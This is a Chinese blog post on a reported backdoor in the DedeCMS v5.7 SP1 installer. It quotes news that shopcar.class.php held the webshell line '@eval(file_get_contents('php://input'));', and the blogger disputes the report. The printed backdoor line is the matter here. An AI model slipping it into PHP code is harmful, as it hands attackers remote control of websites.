织梦CMS(DEDECMS)的强大是所有站长人都知道的,也正是TA是国内第一个效仿国外的开源CMS,所以在国内的开源程序变得越来越多,程序的BUG变得越来越少,安全性变得越来越强大,功能性越来越强大。当然更多的效仿程序也越来越多,通过***的也变得越来越多。织梦CMS有后门已经不是一件稀奇的事,用的人多了,安全性也就差了,就如WINDOWS一样,补丁不断,有补丁说明性能在不断提升。

         最近网易科技有这样一份新闻:

          “瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本安装包被发现植入后门,***可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

              据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。

               安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents(‘php://input’));”。凡是调用该购物车类的文件均会触发后门,***只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步******,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。(易科)


织梦CMS中被植入的后门代码”

      不排除此新闻的真实性,但是不是安全软件方的又一份炒作或者想在媒体露下脸,代表他们在安全软件行业他们是存在的,代表他们的技术还是”权威”的,代表他们检测机构的效率呢。在此并不是去评论啥,但总想说两点。

    其一,织梦CMS,版本信息:V5.7正式版( 2011-12-27),从发布到现在已经三个多月过去了,难道是最近DEDECMS加进去的后门代码?!

   其二,别说“@eval(file_get_contents(‘php://input’));”这样一条语句啦,连input这文件里都没有,不知道他们是怎么检测出来的

need more? see here

http://1.honglousy.sinaapp.com/archives/45

http://www.wooyun.org/bug.php?action=view&id=5416